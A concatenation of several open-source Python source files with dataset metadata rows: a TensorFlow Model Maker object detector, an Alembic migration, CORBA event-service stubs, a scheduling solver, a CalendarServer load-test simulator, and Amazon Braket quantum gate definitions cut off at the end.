#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ObjectDetector class."""
import tensorflow as tf
from tensorflow_examples.lite.model_maker.core import compat
from tensorflow_examples.lite.model_maker.core.task import custom_model
from tensorflow_examples.lite.model_maker.core.task import model_spec as ms
def create(train_data,
model_spec,
validation_data=None,
epochs=None,
batch_size=None,
do_train=True):
"""Loads data and train the model for test classification.
Args:
train_data: Training data.
model_spec: Specification for the model.
validation_data: Validation data. If None, skips validation process.
epochs: Number of epochs for training.
batch_size: Batch size for training.
do_train: Whether to run training.
Returns:
TextClassifier
"""
model_spec = ms.get(model_spec)
if compat.get_tf_behavior() not in model_spec.compat_tf_versions:
raise ValueError('Incompatible versions. Expect {}, but got {}.'.format(
model_spec.compat_tf_versions, compat.get_tf_behavior()))
object_detector = ObjectDetector(model_spec, train_data.label_map)
if do_train:
tf.compat.v1.logging.info('Retraining the models...')
object_detector.train(train_data, validation_data, epochs, batch_size)
else:
object_detector.create_model()
return object_detector
class ObjectDetector(custom_model.CustomModel):
"""ObjectDetector class for inference and exporting to tflite."""
def __init__(self, model_spec, label_map):
super().__init__(model_spec, shuffle=None)
if model_spec.config.label_map and model_spec.config.label_map != label_map:
tf.compat.v1.logging.warn(
'Label map is not the same as the previous label_map in model_spec.')
model_spec.config.label_map = label_map
model_spec.config.num_classes = len(label_map)
def create_model(self):
self.model = self.model_spec.create_model()
return self.model
def _get_dataset_and_steps(self, data, batch_size, is_training):
"""Gets dataset, steps and annotations json file."""
if not data:
return None, 0, None
# TODO(b/171449557): Put this into DataLoader.
dataset = data.gen_dataset(
self.model_spec, batch_size, is_training=is_training)
steps = len(data) // batch_size
return dataset, steps, data.annotations_json_file
def train(self,
train_data,
validation_data=None,
epochs=None,
batch_size=None):
"""Feeds the training data for training."""
batch_size = batch_size if batch_size else self.model_spec.batch_size
# TODO(b/171449557): Upstream this to the parent class.
if len(train_data) < batch_size:
raise ValueError('The size of the train_data (%d) couldn\'t be smaller '
'than batch_size (%d). To solve this problem, set '
'the batch_size smaller or increase the size of the '
'train_data.' % (len(train_data), batch_size))
with self.model_spec.ds_strategy.scope():
self.create_model()
train_ds, steps_per_epoch, _ = self._get_dataset_and_steps(
train_data, batch_size, is_training=True)
validation_ds, validation_steps, val_json_file = self._get_dataset_and_steps(
validation_data, batch_size, is_training=False)
return self.model_spec.train(self.model, train_ds, steps_per_epoch,
validation_ds, validation_steps, epochs,
batch_size, val_json_file)
def evaluate(self, data, batch_size=None):
"""Evaluates the model."""
batch_size = batch_size if batch_size else self.model_spec.batch_size
ds = data.gen_dataset(self.model_spec, batch_size, is_training=False)
steps = len(data) // batch_size
# TODO(b/171449557): Upstream this to the parent class.
if steps <= 0:
raise ValueError('The size of the validation_data (%d) couldn\'t be '
'smaller than batch_size (%d). To solve this problem, '
'set the batch_size smaller or increase the size of the '
'validation_data.' % (len(data), batch_size))
return self.model_spec.evaluate(self.model, ds, steps,
data.annotations_json_file)
| 40.908333 | 83 | 0.692605 |
299ea394a3c738b3b6ac6015aaa85d2ddef4333a | 657 | py | Python | migrations/versions/6cf36da6705f_.py | alexmeigz/CS148_Project_Backend | 95c9981b9342b0509d5c58ea6e9f2a8b400d1444 | [
"Apache-2.0"
] | null | null | null | migrations/versions/6cf36da6705f_.py | alexmeigz/CS148_Project_Backend | 95c9981b9342b0509d5c58ea6e9f2a8b400d1444 | [
"Apache-2.0"
] | 13 | 2020-11-03T06:30:06.000Z | 2020-12-17T02:15:24.000Z | migrations/versions/6cf36da6705f_.py | alexmeigz/CS148_Project_Backend | 95c9981b9342b0509d5c58ea6e9f2a8b400d1444 | [
"Apache-2.0"
] | null | null | null | """empty message
Revision ID: 6cf36da6705f
Revises: 6561c4454534
Create Date: 2020-11-15 02:32:23.520188
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '6cf36da6705f'
down_revision = '6561c4454534'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('product', sa.Column('image_url', sa.Text(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('product', 'image_url')
# ### end Alembic commands ###
| 22.655172 | 78 | 0.692542 |
569b8a9d9bbbfa30e87de0f739cd6e961ef6eada | 7,461 | py | Python | src/hapPyTango/CosEventComm/__init__.py | mguijarr/hapPyTango | 2506c8e83d93fbd2c0a0115983489d59c74caa2f | [
"MIT"
] | 1 | 2020-10-28T16:57:36.000Z | 2020-10-28T16:57:36.000Z | src/hapPyTango/CosEventComm/__init__.py | mguijarr/hapPyTango | 2506c8e83d93fbd2c0a0115983489d59c74caa2f | [
"MIT"
] | null | null | null | src/hapPyTango/CosEventComm/__init__.py | mguijarr/hapPyTango | 2506c8e83d93fbd2c0a0115983489d59c74caa2f | [
"MIT"
] | null | null | null | """ Module: IDL:omg.org/CosEventComm:1.0
Automagically generated by:-
The ORB called Fnorb v1.1.Return.of.Fnorb
"""
_FNORB_ID = "IDL:omg.org/CosEventComm:1.0"
# Fnorb modules.
import Fnorb.orb.CORBA
import Fnorb.orb.TypeManager
import Fnorb.orb.Util
class Disconnected(Fnorb.orb.CORBA.UserException):
""" Exception: IDL:omg.org/CosEventComm/Disconnected:1.0 """
_FNORB_ID = "IDL:omg.org/CosEventComm/Disconnected:1.0"
def __init__(self):
""" Constructor. """
return
Fnorb.orb.TypeManager.TypeManager_init().add_type("IDL:omg.org/CosEventComm/Disconnected:1.0", "00000000000000160000004C000000000000002A49444C3A6F6D672E6F72672F436F734576656E74436F6D6D2F446973636F6E6E65637465643A312E300000000000000D446973636F6E6E65637465640000000000000000", Disconnected)
class PushConsumer(Fnorb.orb.CORBA.Object):
""" Interface: IDL:omg.org/CosEventComm/PushConsumer:1.0 """
_FNORB_ID = "IDL:omg.org/CosEventComm/PushConsumer:1.0"
def push(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PushConsumer/push:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_any)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:omg.org/CosEventComm/Disconnected:1.0"))
# Create a request object.
request = self._create_request("push", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
def disconnect_push_consumer(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PushConsumer/disconnect_push_consumer:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
# Create a request object.
request = self._create_request("disconnect_push_consumer", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
Fnorb.orb.TypeManager.TypeManager_init().add_type("IDL:omg.org/CosEventComm/PushConsumer:1.0", "000000000000000E00000045000000000000002A49444C3A6F6D672E6F72672F436F734576656E74436F6D6D2F50757368436F6E73756D65723A312E300000000000000D50757368436F6E73756D657200", PushConsumer)
class PushSupplier(Fnorb.orb.CORBA.Object):
""" Interface: IDL:omg.org/CosEventComm/PushSupplier:1.0 """
_FNORB_ID = "IDL:omg.org/CosEventComm/PushSupplier:1.0"
def disconnect_push_supplier(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PushSupplier/disconnect_push_supplier:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
# Create a request object.
request = self._create_request("disconnect_push_supplier", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
Fnorb.orb.TypeManager.TypeManager_init().add_type("IDL:omg.org/CosEventComm/PushSupplier:1.0", "000000000000000E00000045000000000000002A49444C3A6F6D672E6F72672F436F734576656E74436F6D6D2F50757368537570706C6965723A312E300000000000000D50757368537570706C69657200", PushSupplier)
class PullSupplier(Fnorb.orb.CORBA.Object):
""" Interface: IDL:omg.org/CosEventComm/PullSupplier:1.0 """
_FNORB_ID = "IDL:omg.org/CosEventComm/PullSupplier:1.0"
def pull(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PullSupplier/pull:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_any)
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:omg.org/CosEventComm/Disconnected:1.0"))
# Create a request object.
request = self._create_request("pull", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
def try_pull(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PullSupplier/try_pull:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_any)
outputs.append(Fnorb.orb.CORBA.TC_boolean)
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:omg.org/CosEventComm/Disconnected:1.0"))
# Create a request object.
request = self._create_request("try_pull", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
def disconnect_pull_supplier(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PullSupplier/disconnect_pull_supplier:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
# Create a request object.
request = self._create_request("disconnect_pull_supplier", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
Fnorb.orb.TypeManager.TypeManager_init().add_type("IDL:omg.org/CosEventComm/PullSupplier:1.0", "000000000000000E00000045000000000000002A49444C3A6F6D672E6F72672F436F734576656E74436F6D6D2F50756C6C537570706C6965723A312E300000000000000D50756C6C537570706C69657200", PullSupplier)
class PullConsumer(Fnorb.orb.CORBA.Object):
""" Interface: IDL:omg.org/CosEventComm/PullConsumer:1.0 """
_FNORB_ID = "IDL:omg.org/CosEventComm/PullConsumer:1.0"
def disconnect_pull_consumer(self, *args, **kw):
""" Operation: IDL:omg.org/CosEventComm/PullConsumer/disconnect_pull_consumer:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
# Create a request object.
request = self._create_request("disconnect_pull_consumer", inputs, outputs, exceptions)
# Make the request!
apply(request.invoke, args, kw)
# Return the results.
return request.results()
Fnorb.orb.TypeManager.TypeManager_init().add_type("IDL:omg.org/CosEventComm/PullConsumer:1.0", "000000000000000E00000045000000000000002A49444C3A6F6D672E6F72672F436F734576656E74436F6D6D2F50756C6C436F6E73756D65723A312E300000000000000D50756C6C436F6E73756D657200", PullConsumer)
#############################################################################
| 35.36019 | 288 | 0.6794 |
aeddd9de0bce4bfb21cf4760ce647c40073eb284 | 2,983 | py | Python | src/pyschedule/solvers/listsched.py | cutec-chris/pyschedule | 7bcd235ff9a35d11ea3edbd81859b69ffb170115 | [
"Apache-2.0"
] | 267 | 2015-03-28T10:29:35.000Z | 2022-02-07T08:54:59.000Z | src/pyschedule/solvers/listsched.py | cutec-chris/pyschedule | 7bcd235ff9a35d11ea3edbd81859b69ffb170115 | [
"Apache-2.0"
] | 92 | 2015-07-17T11:01:37.000Z | 2021-08-05T10:29:19.000Z | src/pyschedule/solvers/listsched.py | cutec-chris/pyschedule | 7bcd235ff9a35d11ea3edbd81859b69ffb170115 | [
"Apache-2.0"
] | 64 | 2015-06-27T10:05:45.000Z | 2021-03-26T08:03:16.000Z | #! /usr/bin/env python
from __future__ import print_function
'''
Copyright 2015 Tim Nonner
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
'''
import copy
def sort_with_precs(scenario) :
"""
returns the tasks of the given scenario sorted according to the
lax precedence constraints and next according to the task length,
where large tasks have priority
"""
S = scenario
'''
# get direct children for topological sort
children = { T : set() for T in S.tasks() }
for P in S.precs_lax() :
children[P.left].add(P.right)
# extend children to other descendents
for T in S.tasks() :
task_stack = {T}
while task_stack :
T_ = task_stack.pop()
children[T] = children[T] | children[T_]
task_stack = task_stack | children[T_]
'''
import networkx as nx
G = nx.DiGraph()
G.add_nodes_from(S.tasks())
G.add_edges_from([ (P.task_left,P.task_right) for P in S.precs_lax() ])
task_list = nx.algorithms.topological_sort(G)
return task_list
#TODO: list as parameter of solving procedure
def solve(scenario,solve_method,task_list=None,batch_size=1,plot_method=None,msg=0) :
"""
Iteratively adds tasks and uses solve_method to integrate these
tasks into the schedule.
Arguments:
scenario : the scenario to solve
task_list : list of all tasks which defines the order in which all tasks are
added to the schedule
batch_size : the number of tasks to integrate in the schedule at a time
"""
S = scenario
if task_list is None :
task_list = sort_with_precs(S)
constraints = S._constraints # keep references and clear old reference list
S._constraints = []
#non_objective_tasks = [ T for T in task_list if not T.objective ]
for T in task_list :
S -= T #remove all tasks which are not part of objective
def batches(tasks, batch_size):
for i in xrange(0, len(tasks), batch_size):
yield tasks[i:i+batch_size]
for batch in batches(task_list,batch_size) :
if msg :
print('INFO: batch for list scheduling '+','.join([ str(T) for T in batch]))
for T in batch :
S += T
S._constraints = [ C for C in constraints if set(C.tasks()).issubset(set(S.tasks())) ]
solve_method(S)
if plot_method is not None:
plot_method(S)
for T in S.tasks():
S += T >= T.start_value
| 26.166667 | 88 | 0.721757 |
83843009f88834104d6d7760e17c63db5d118882 | 5,711 | py | Python | contrib/performance/loadtest/ampsim.py | backwardn/ccs-calendarserver | 13c706b985fb728b9aab42dc0fef85aae21921c3 | [
"Apache-2.0"
] | 462 | 2016-08-14T17:43:24.000Z | 2022-03-17T07:38:16.000Z | contrib/performance/loadtest/ampsim.py | backwardn/ccs-calendarserver | 13c706b985fb728b9aab42dc0fef85aae21921c3 | [
"Apache-2.0"
] | 72 | 2016-09-01T23:19:35.000Z | 2020-02-05T02:09:26.000Z | contrib/performance/loadtest/ampsim.py | backwardn/ccs-calendarserver | 13c706b985fb728b9aab42dc0fef85aae21921c3 | [
"Apache-2.0"
] | 171 | 2016-08-16T03:50:30.000Z | 2022-03-26T11:49:55.000Z | ##
# Copyright (c) 2011-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##
"""
AMP-based simulator.
"""
if __name__ == '__main__':
# When run as a script, this is the worker process, receiving commands over
# stdin.
def runmain():
import traceback
try:
__import__("twext")
from twisted.python.log import startLogging
from sys import exit, stderr
startLogging(stderr)
from twisted.internet import reactor
from twisted.internet.stdio import StandardIO
from contrib.performance.loadtest.ampsim import Worker # @UnresolvedImport
from contrib.performance.loadtest.sim import LagTrackingReactor
StandardIO(Worker(LagTrackingReactor(reactor)))
reactor.run()
except:
traceback.print_exc()
exit(1)
else:
exit(0)
runmain()
from copy import deepcopy
from plistlib import writePlistToString, readPlistFromString
from twisted.python.log import msg, addObserver
from twisted.protocols.amp import AMP, Command, String, Unicode
from twext.enterprise.adbapi2 import Pickle
from contrib.performance.loadtest.sim import _DirectoryRecord, LoadSimulator
class Configure(Command):
"""
Configure this worker process with the text of an XML property list.
"""
arguments = [("plist", String())]
# Pass OSError exceptions through, presenting the exception message to the user.
errors = {OSError: 'OSError'}
class LogMessage(Command):
"""
This message represents an observed log message being relayed from a worker
process to the manager process.
"""
arguments = [("event", Pickle())]
class Account(Command):
"""
This message represents a L{_DirectoryRecord} loaded by the manager process
being relayed to a worker.
"""
arguments = [
("uid", Unicode()),
("password", Unicode()),
("commonName", Unicode()),
("email", Unicode()),
("guid", Unicode()),
]
class Worker(AMP):
"""
Protocol to be run in the worker process, to handle messages from its
manager.
"""
def __init__(self, reactor):
super(Worker, self).__init__()
self.reactor = reactor
self.records = []
@Account.responder
def account(self, **kw):
self.records.append(_DirectoryRecord(**kw))
return {}
@Configure.responder
def config(self, plist):
from sys import stderr
cfg = readPlistFromString(plist)
addObserver(self.emit)
sim = LoadSimulator.fromConfig(cfg)
sim.records = self.records
sim.attachServices(stderr)
return {}
def emit(self, eventDict):
if 'type' in eventDict:
self.reactor.callFromThread(
self.callRemote, LogMessage, event=eventDict
)
def connectionLost(self, reason):
super(Worker, self).connectionLost(reason)
msg("Standard IO connection lost.")
self.reactor.stop()
class Manager(AMP):
"""
Protocol to be run in the coordinating process, to respond to messages from
a single worker.
"""
def __init__(self, loadsim, whichWorker, numWorkers, output):
super(Manager, self).__init__()
self.loadsim = loadsim
self.whichWorker = whichWorker
self.numWorkers = numWorkers
self.output = output
def connectionMade(self):
super(Manager, self).connectionMade()
for record in self.loadsim.records:
self.callRemote(Account,
uid=record.uid,
password=record.password,
commonName=record.commonName,
email=record.email,
guid=record.guid)
workerConfig = deepcopy(self.loadsim.configTemplate)
# The list of workers is for the manager only; the workers themselves
# know they're workers because they _don't_ receive this list.
del workerConfig["workers"]
# The manager loads the accounts via the configured loader, then sends
# them out to the workers (right above), which look at the state at an
# instance level and therefore don't need a globally-named directory
# record loader.
del workerConfig["accounts"]
workerConfig["workerID"] = self.whichWorker
workerConfig["workerCount"] = self.numWorkers
workerConfig["observers"] = []
workerConfig.pop("accounts", None)
plist = writePlistToString(workerConfig)
self.output.write("Initiating worker configuration\n")
def completed(x):
self.output.write("Worker configuration complete.\n")
def failed(reason):
self.output.write("Worker configuration failed. {}\n".format(reason))
self.callRemote(Configure, plist=plist).addCallback(completed).addErrback(failed)
@LogMessage.responder
def observed(self, event):
# from pprint import pformat
# self.output.write(pformat(event)+"\n")
msg(**event)
return {}
| 30.704301 | 89 | 0.639293 |
f0514f8eae309f95f99624072f2fdb18fc361282 | 26,979 | py | Python | src/braket/ir/jaqcd/instructions.py | orclassiq/amazon-braket-schemas-python | 895ccb6c15a678975894b7b13fc91febe914719e | [
"Apache-2.0"
] | null | null | null | src/braket/ir/jaqcd/instructions.py | orclassiq/amazon-braket-schemas-python | 895ccb6c15a678975894b7b13fc91febe914719e | [
"Apache-2.0"
] | null | null | null | src/braket/ir/jaqcd/instructions.py | orclassiq/amazon-braket-schemas-python | 895ccb6c15a678975894b7b13fc91febe914719e | [
"Apache-2.0"
] | null | null | null | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from enum import Enum
from braket.ir.jaqcd.shared_models import (
Angle,
CompilerDirective,
DampingProbability,
DampingSingleProbability,
DoubleControl,
DoubleTarget,
MultiProbability,
MultiTarget,
SingleControl,
SingleProbability,
SingleProbability_34,
SingleProbability_1516,
SingleTarget,
TripleProbability,
TwoDimensionalMatrix,
TwoDimensionalMatrixList,
)
"""
Instructions that can be supplied to the braket.ir.jaqcd.Program.
To add a new instruction:
- Implement a class in this module.
- Class must contain a property, "type", that is an enum of the class implemented in the
next step.
- Implement a subclass, "Type", within this class that extends [str, enum].
All enum values must be unique across all instructions, otherwise de-serialization
will have undeterministic behaviors. These enums will be used to determine what type
the instruction is, i.e. what class to use for deserializing.
- NOTE: Due to how multiple inhertiance works in Python it is easiest to define a
type enum class within each instruction, instead of calling the relevant parent
constructors to initialize it correctly.
- Inherit any classes from braket.ir.jaqcd.shared_models.
- Write up docstrings to define the instruction, properties, and examples.
"""
class H(SingleTarget):
"""
Hadamard gate.
Attributes:
type (str): The instruction type. default = "h". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> H(target=1)
"""
class Type(str, Enum):
h = "h"
type = Type.h
class I(SingleTarget): # noqa: E742, E261
"""
Identity gate.
Attributes:
type (str): The instruction type. default = "i". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> I(target=1)
"""
class Type(str, Enum):
i = "i"
type = Type.i
class X(SingleTarget):
"""
Pauli-X gate.
Attributes:
type (str): The instruction type. default = "x". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> X(target=0)
"""
class Type(str, Enum):
x = "x"
type = Type.x
class Y(SingleTarget):
"""
Pauli-Y gate.
Attributes:
type (str): The instruction type. default = "y". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Y(target=0)
"""
class Type(str, Enum):
y = "y"
type = Type.y
class Z(SingleTarget):
"""
Pauli-Z gate.
Attributes:
type (str): The instruction type. default = "z". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Z(target=0)
"""
class Type(str, Enum):
z = "z"
type = Type.z
class Rx(SingleTarget, Angle):
"""
X-axis rotation gate.
Attributes:
type (str): The instruction type. default = "rx". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
Examples:
>>> Rx(target=0, angle=0.15)
"""
class Type(str, Enum):
rx = "rx"
type = Type.rx
class Ry(SingleTarget, Angle):
"""
Y-axis rotation gate.
Attributes:
type (str): The instruction type. default = "ry". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
Examples:
>>> Ry(target=0, angle=0.15)
"""
class Type(str, Enum):
ry = "ry"
type = Type.ry
class Rz(SingleTarget, Angle):
"""
Z-axis rotation gate.
Attributes:
type (str): The instruction type. default = "rz". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
Examples:
>>> Rz(target=0, angle=0.15)
"""
class Type(str, Enum):
rz = "rz"
type = Type.rz
class S(SingleTarget):
"""
S gate. Applies a 90 degree rotation around the Z-axis.
Attributes:
type (str): The instruction type. default = "s". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> S(target=0)
"""
class Type(str, Enum):
s = "s"
type = Type.s
class T(SingleTarget):
"""
T gate. Applies a 45 degree rotation around the Z-axis.
Attributes:
type (str): The instruction type. default = "t". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> T(target=0)
"""
class Type(str, Enum):
t = "t"
type = Type.t
class Si(SingleTarget):
"""
Si gate. Conjugate transpose of S gate.
Attributes:
type (str): The instruction type. default = "si". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Si(target=0)
"""
class Type(str, Enum):
si = "si"
type = Type.si
class Ti(SingleTarget):
"""
Ti gate. Conjugate transpose of T gate.
Attributes:
type (str): The instruction type. default = "ti". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Ti(target=0)
"""
class Type(str, Enum):
ti = "ti"
type = Type.ti
class Swap(DoubleTarget):
"""
Swap gate. Swaps the state of the two qubits.
Attributes:
type (str): The instruction type. default = "swap". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> Swap(targets=[0, 1])
"""
class Type(str, Enum):
swap = "swap"
type = Type.swap
class CSwap(SingleControl, DoubleTarget):
"""
Controlled swap gate.
Attributes:
type (str): The instruction type. default = "cswap". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> Swap(control=0, targets=[1, 2])
"""
class Type(str, Enum):
cswap = "cswap"
type = Type.cswap
class ISwap(DoubleTarget):
"""
ISwap gate. Swaps the state of two qubits, applying a -i phase to q1 when it is in the 1 state
and a -i phase to q2 when it is in the 0 state.
This is equivalent to XY(pi)
Attributes:
type (str): The instruction type. default = "iswap". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> ISwap(targets=[0, 1])
"""
class Type(str, Enum):
iswap = "iswap"
type = Type.iswap
class PSwap(DoubleTarget, Angle):
"""
Parameterized swap gate that takes in the angle of the phase to apply to the swapped gates.
Attributes:
type (str): The instruction type. default = "pswap". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> PSwap(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
pswap = "pswap"
type = Type.pswap
class XY(DoubleTarget, Angle):
"""
Rotates between \\|01> and \\|10> by the given angle.
Attributes:
type (str): The instruction type. default = "xy". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> XY(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
xy = "xy"
type = Type.xy
class PhaseShift(SingleTarget, Angle):
"""
Phase shift gate. Shifts the phase between \\|0> and \\|1> by a given angle.
Attributes:
type (str): The instruction type. default = "phaseshift". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PhaseShift(target=1, angle=0.15)
"""
class Type(str, Enum):
phaseshift = "phaseshift"
type = Type.phaseshift
class CPhaseShift(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate.
Attributes:
type (str): The instruction type. default = "cphaseshift". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift = "cphaseshift"
type = Type.cphaseshift
class CPhaseShift00(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate that phases the \\|00> state.
Attributes:
type (str): The instruction type. default = "cphaseshift00". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift00(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift00 = "cphaseshift00"
type = Type.cphaseshift00
class CPhaseShift01(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate that phases the \\|01> state.
Attributes:
type (str): The instruction type. default = "cphaseshift01". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift01(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift01 = "cphaseshift01"
type = Type.cphaseshift01
class CPhaseShift10(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate that phases the \\|10> state.
Attributes:
type (str): The instruction type. default = "cphaseshift10". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift10(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift10 = "cphaseshift10"
type = Type.cphaseshift10
class CNot(SingleTarget, SingleControl):
"""
Controlled not gate. Also known as the CX gate.
Attributes:
type (str): The instruction type. default = "cnot". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CNot(control=0, target=1)
"""
class Type(str, Enum):
cnot = "cnot"
type = Type.cnot
class CCNot(SingleTarget, DoubleControl):
"""
Doubly-controlled NOT gate. Also known as the Toffoli gate.
Attributes:
type (str): The instruction type. default = "ccnot". (type) is optional.
This should be unique among all instruction types.
controls (int): The control qubits.
This is a list with two items and all items are int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CCNot(control=[0,1], target=1)
"""
class Type(str, Enum):
ccnot = "ccnot"
type = Type.ccnot
class CV(SingleTarget, SingleControl):
"""
Controlled sqrt(NOT) gate. Also known as the CV gate.
Attributes:
type (str): The instruction type. default = "cv". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
